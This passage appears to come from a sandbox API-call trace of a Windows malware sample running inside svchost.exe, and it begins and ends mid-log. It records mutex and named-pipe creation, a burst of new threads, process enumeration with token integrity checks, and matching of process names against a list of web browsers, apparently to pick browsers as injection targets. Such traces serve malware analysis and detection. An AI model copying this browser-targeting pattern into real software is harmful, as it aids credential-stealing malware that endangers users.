dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0458.129] GetVersionExW (in: lpVersionInformation=0x1cefd8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x1cf090, dwMinorVersion=0x77dfd, dwBuildNumber=0x6, dwPlatformId=0x1, szCSDVersion="Ĝ") | out: lpVersionInformation=0x1cefd8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0458.129] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x1cf104 | out: TokenHandle=0x1cf104*=0xe0) returned 1 [0458.129] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cf100 | out: TokenInformation=0x0, ReturnLength=0x1cf100) returned 0 [0458.129] GetLastError () returned 0x7a [0458.129] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0x19, TokenInformation=0x44f7d0, TokenInformationLength=0x14, ReturnLength=0x1cf100 | out: TokenInformation=0x44f7d0, ReturnLength=0x1cf100) returned 1 [0458.130] GetSidSubAuthorityCount (pSid=0x44f7d8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x44f7d9 [0458.130] GetSidSubAuthority (pSid=0x44f7d8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x44f7e0 [0458.130] CloseHandle (hObject=0xe0) returned 1 [0458.130] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x1cfb7c | out: TokenHandle=0x1cfb7c*=0xe0) returned 1 [0458.130] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cfb64 | out: TokenInformation=0x0, ReturnLength=0x1cfb64) returned 0 [0458.130] GetLastError () returned 0x7a [0458.130] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0x1, TokenInformation=0x44f7d0, TokenInformationLength=0x24, ReturnLength=0x1cfb64 | out: TokenInformation=0x44f7d0, ReturnLength=0x1cfb64) returned 1 [0458.130] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0xc, TokenInformation=0x877e0, TokenInformationLength=0x4, ReturnLength=0x1cfb78 | out: TokenInformation=0x877e0, ReturnLength=0x1cfb78) returned 1 [0458.130] CloseHandle (hObject=0xe0) returned 1 [0458.130] GetLengthSid (pSid=0x44f7d8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0458.130] GetCurrentProcess () returned 0xffffffff [0458.130] GetModuleFileNameExW (in: hProcess=0xffffffff, hModule=0x0, lpFilename=0x1cf97c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\svchost.exe" (normalized: "c:\\windows\\syswow64\\svchost.exe")) returned 0x1f [0458.130] wvnsprintfW (in: pszDest=0x1cf8c8, cchDest=3, pszFmt="%02X", arglist=0x1cf8a4 | out: pszDest="E5") returned 2 [0458.130] wvnsprintfW (in: pszDest=0x1cf8c8, cchDest=3, pszFmt="%02X", arglist=0x1cf8a4 | out: pszDest="8E") returned 2 [0458.130] wvnsprintfW (in: pszDest=0x1cf8c8, cchDest=3, pszFmt="%02X", arglist=0x1cf8a4 | out: pszDest="FF") returned 2 [0458.130] wvnsprintfW (in: pszDest=0x1cf8c8, cchDest=3, pszFmt="%02X", arglist=0x1cf8a4 | out: pszDest="54") returned 2 [0458.130] wvnsprintfW (in: pszDest=0x1cf8c8, cchDest=3, pszFmt="%02X", arglist=0x1cf8a4 | out: pszDest="09") returned 2 [0458.130] wvnsprintfW (in: pszDest=0x1cf8c8, cchDest=3, pszFmt="%02X", arglist=0x1cf8a4 | out: pszDest="68") returned 2 [0458.130] wvnsprintfW (in: pszDest=0x1cf8c8, cchDest=3, pszFmt="%02X", arglist=0x1cf8a4 | out: pszDest="A4") returned 2 [0458.130] wvnsprintfW (in: pszDest=0x1cf8c8, cchDest=3, pszFmt="%02X", arglist=0x1cf8a4 | out: pszDest="36") returned 2 [0458.130] wvnsprintfW (in: pszDest=0x1cf8c8, cchDest=3, pszFmt="%02X", arglist=0x1cf8a4 | out: pszDest="E9") returned 2 [0458.130] wvnsprintfW (in: pszDest=0x1cf8c8, cchDest=3, pszFmt="%02X", arglist=0x1cf8a4 | out: pszDest="82") returned 2 [0458.130] wvnsprintfW (in: pszDest=0x1cf8c8, cchDest=3, pszFmt="%02X", arglist=0x1cf8a4 | out: pszDest="FC") returned 2 [0458.130] wvnsprintfW (in: pszDest=0x1cf8c8, cchDest=3, pszFmt="%02X", arglist=0x1cf8a4 | out: pszDest="FA") returned 2 [0458.130] wvnsprintfW (in: pszDest=0x1cf8c8, cchDest=3, pszFmt="%02X", arglist=0x1cf8a4 | out: pszDest="1C") returned 2 [0458.130] wvnsprintfW (in: pszDest=0x1cf8c8, cchDest=3, pszFmt="%02X", arglist=0x1cf8a4 | out: pszDest="04") returned 2 [0458.130] wvnsprintfW (in: pszDest=0x1cf8c8, cchDest=3, pszFmt="%02X", arglist=0x1cf8a4 | out: pszDest="45") returned 2 [0458.130] wvnsprintfW (in: pszDest=0x1cf8c8, cchDest=3, pszFmt="%02X", arglist=0x1cf8a4 | out: pszDest="A2") returned 2 [0458.130] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="E58EFF540968A436E982FCFA1C0445A2") returned 0xe0 [0458.130] GetLastError () returned 0x0 [0458.130] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7b1d3, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe4 [0458.131] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x795f6, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe8 [0458.131] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x799af, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xec [0458.132] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7b416, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf0 [0458.132] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7c086, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf4 [0458.133] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7f274, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf8 [0458.133] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x78f74, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x1cf4c8 | out: lpThreadId=0x1cf4c8*=0x774) returned 0xfc [0458.134] CloseHandle (hObject=0xfc) returned 1 Thread: id = 351 os_tid = 0x760 Thread: id = 352 os_tid = 0x594 [0458.134] wvnsprintfW (in: pszDest=0x24bfbe0, cchDest=3, pszFmt="%02X", arglist=0x24bfbbc | out: pszDest="D3") returned 2 [0458.134] wvnsprintfW (in: pszDest=0x24bfbe0, cchDest=3, pszFmt="%02X", arglist=0x24bfbbc | out: pszDest="B6") returned 2 [0458.134] wvnsprintfW (in: pszDest=0x24bfbe0, cchDest=3, pszFmt="%02X", arglist=0x24bfbbc | out: pszDest="C4") returned 2 [0458.134] wvnsprintfW (in: pszDest=0x24bfbe0, cchDest=3, pszFmt="%02X", arglist=0x24bfbbc | out: pszDest="DE") returned 2 [0458.134] wvnsprintfW (in: pszDest=0x24bfbe0, cchDest=3, pszFmt="%02X", arglist=0x24bfbbc | out: pszDest="8C") returned 2 [0458.134] wvnsprintfW (in: pszDest=0x24bfbe0, cchDest=3, pszFmt="%02X", arglist=0x24bfbbc | out: pszDest="F7") returned 2 [0458.134] wvnsprintfW (in: pszDest=0x24bfbe0, cchDest=3, pszFmt="%02X", arglist=0x24bfbbc | out: pszDest="9A") returned 2 [0458.135] wvnsprintfW (in: pszDest=0x24bfbe0, cchDest=3, pszFmt="%02X", arglist=0x24bfbbc | out: pszDest="85") returned 2 [0458.135] wvnsprintfW (in: pszDest=0x24bfbe0, cchDest=3, pszFmt="%02X", arglist=0x24bfbbc | out: pszDest="4B") returned 2 [0458.135] wvnsprintfW (in: pszDest=0x24bfbe0, cchDest=3, pszFmt="%02X", arglist=0x24bfbbc | out: pszDest="54") returned 2 [0458.135] wvnsprintfW (in: pszDest=0x24bfbe0, cchDest=3, pszFmt="%02X", arglist=0x24bfbbc | out: pszDest="9E") returned 2 [0458.135] wvnsprintfW (in: pszDest=0x24bfbe0, cchDest=3, pszFmt="%02X", arglist=0x24bfbbc | out: pszDest="E2") returned 2 [0458.135] wvnsprintfW (in: pszDest=0x24bfbe0, cchDest=3, pszFmt="%02X", arglist=0x24bfbbc | out: pszDest="32") returned 2 [0458.135] wvnsprintfW (in: pszDest=0x24bfbe0, cchDest=3, pszFmt="%02X", arglist=0x24bfbbc | out: pszDest="F0") returned 2 [0458.135] wvnsprintfW (in: pszDest=0x24bfbe0, cchDest=3, pszFmt="%02X", arglist=0x24bfbbc | out: pszDest="8C") returned 2 [0458.135] wvnsprintfW (in: pszDest=0x24bfbe0, cchDest=3, pszFmt="%02X", arglist=0x24bfbbc | out: pszDest="89") returned 2 [0458.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x44f870, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0458.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x44f870, cbMultiByte=11, lpWideCharStr=0x44f888, cchWideChar=12 | out: lpWideCharStr="\\\\.\\pipe\\%s") returned 11 [0458.135] wvnsprintfW (in: pszDest=0x44f8b0, cchDest=523, pszFmt="\\\\.\\pipe\\%s", arglist=0x24bfe3c | out: pszDest="\\\\.\\pipe\\D3B6C4DE8CF79A854B549EE232F08C89") returned 41 [0458.135] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0458.135] CreateNamedPipeW (lpName="\\\\.\\pipe\\D3B6C4DE8CF79A854B549EE232F08C89" (normalized: "\\device\\namedpipe\\d3b6c4de8cf79a854b549ee232f08c89"), dwOpenMode=0x40000003, dwPipeMode=0x0, nMaxInstances=0xff, nOutBufferSize=0x0, nInBufferSize=0x0, nDefaultTimeOut=0x0, lpSecurityAttributes=0x877e4) returned 0x4c [0458.135] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xb4 [0458.135] ConnectNamedPipe (in: hNamedPipe=0x4c, lpOverlapped=0x24bfebc | out: lpOverlapped=0x24bfebc) returned 0 [0458.135] GetLastError () returned 0x3e5 [0458.135] WaitForMultipleObjects (nCount=0x2, lpHandles=0x24bfeb4*=0xb4, bWaitAll=0, dwMilliseconds=0xffffffff) Thread: id = 353 os_tid = 0x7bc [0458.135] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0458.135] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0460.146] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77cb0000 [0460.146] GetProcAddress (hModule=0x77cb0000, lpProcName="NtQuerySystemInformation") returned 0x77ccfda0 [0460.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa2b8) returned 0xc0000004 [0460.146] VirtualAlloc (lpAddress=0x0, dwSize=0xb2b8, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0460.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb2b8, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0460.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0460.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0460.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0460.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0460.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0460.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0460.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0460.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0460.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0460.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0460.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0460.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0460.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0460.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0460.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0460.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0460.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0460.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0460.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0460.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0460.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x528 [0460.148] OpenProcessToken (in: ProcessHandle=0x528, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x4f4) returned 1 [0460.148] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0460.148] GetLastError () returned 0x7a [0460.148] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0x1, TokenInformation=0x40fce8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fce8, ReturnLength=0x20f7ac) returned 1 [0460.148] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0460.148] CloseHandle (hObject=0x4f4) returned 1 [0460.148] CloseHandle (hObject=0x528) returned 1 [0460.148] GetLengthSid (pSid=0x40fcf0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0460.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x528 [0460.149] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x20f73a, dwBuildNumber=0x77cb00d8, dwPlatformId=0x20f65c, szCSDVersion="$\x08-") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0460.149] OpenProcessToken (in: ProcessHandle=0x528, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x4f4) returned 1 [0460.149] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0460.149] GetLastError () returned 0x7a [0460.149] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0x19, TokenInformation=0x3d0b48, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x3d0b48, ReturnLength=0x20f7d8) returned 1 [0460.149] GetSidSubAuthorityCount (pSid=0x3d0b50*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x3d0b51 [0460.149] GetSidSubAuthority (pSid=0x3d0b50*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x3d0b58 [0460.149] CloseHandle (hObject=0x4f4) returned 1 [0460.149] CloseHandle (hObject=0x528) returned 1 [0460.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x40e4e0, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0460.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x40e4e0, cbMultiByte=11, lpWideCharStr=0x3dc650, cchWideChar=12 | out: lpWideCharStr="firefox.exe") returned 11 [0460.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x40e570, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0460.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x40e570, cbMultiByte=10, lpWideCharStr=0x3dc2b8, cchWideChar=11 | out: lpWideCharStr="chrome.exe") returned 10 [0460.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x40e678, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0460.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x40e678, cbMultiByte=9, lpWideCharStr=0x3d0968, cchWideChar=10 | out: lpWideCharStr="opera.exe") returned 9 [0460.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3d0da8, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0460.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3d0da8, cbMultiByte=12, lpWideCharStr=0x3dc290, cchWideChar=13 | out: lpWideCharStr="iexplore.exe") returned 12 [0460.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3d0d68, cbMultiByte=17, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0460.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3d0d68, cbMultiByte=17, lpWideCharStr=0x40fce8, cchWideChar=18 | out: lpWideCharStr="MicrosoftEdge.exe") returned 17 [0460.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3d0d08, cbMultiByte=19, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0460.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3d0d08, cbMultiByte=19, lpWideCharStr=0x40f6b0, cchWideChar=20 | out: lpWideCharStr="MicrosoftEdgeCP.exe") returned 19 [0460.150] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0460.150] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0460.150] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0460.150] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0460.150] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0460.150] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0460.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0460.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x528 [0460.150] OpenProcessToken (in: ProcessHandle=0x528, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x4f4) returned 1 [0460.150] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0460.150] GetLastError () returned 0x7a [0460.150] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0460.150] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0460.150] CloseHandle (hObject=0x4f4) returned 1 [0460.150] CloseHandle (hObject=0x528) returned 1 [0460.150] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0460.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x528 [0460.150] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x375ca0, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="# .") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0460.150] OpenProcessToken (in: ProcessHandle=0x528, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x4f4) returned 1 [0460.150] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0460.151] GetLastError () returned 0x7a [0460.151] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0x19, TokenInformation=0x3d0d28, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x3d0d28, ReturnLength=0x20f7d8) returned 1 [0460.151] GetSidSubAuthorityCount (pSid=0x3d0d30*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x3d0d31 [0460.151] GetSidSubAuthority (pSid=0x3d0d30*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x3d0d38 [0460.151] CloseHandle (hObject=0x4f4) returned 1 [0460.151] CloseHandle (hObject=0x528) returned 1 [0460.151] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0460.151] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0460.151] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0460.151] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0460.151] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0460.151] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0460.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x528 [0460.151] OpenProcessToken (in: ProcessHandle=0x528, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x4f4) returned 1 [0460.151] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0460.151] GetLastError () returned 0x7a [0460.151] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0460.151] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0460.151] CloseHandle (hObject=0x4f4) returned 1 [0460.151] CloseHandle (hObject=0x528) returned 1 [0460.151] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0460.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x528 [0460.152] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376460, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="# /") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0460.152] OpenProcessToken (in: ProcessHandle=0x528, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x4f4) returned 1 [0460.152] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0460.152] GetLastError () returned 0x7a [0460.152] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0x19, TokenInformation=0x3d0d28, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x3d0d28, ReturnLength=0x20f7d8) returned 1 [0460.152] GetSidSubAuthorityCount (pSid=0x3d0d30*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x3d0d31 [0460.152] GetSidSubAuthority (pSid=0x3d0d30*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x3d0d38 [0460.152] CloseHandle (hObject=0x4f4) returned 1 [0460.152] CloseHandle (hObject=0x528) returned 1 [0460.152] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0460.152] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0460.152] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0460.152] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0460.152] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0460.152] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0460.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0460.152] OpenProcess 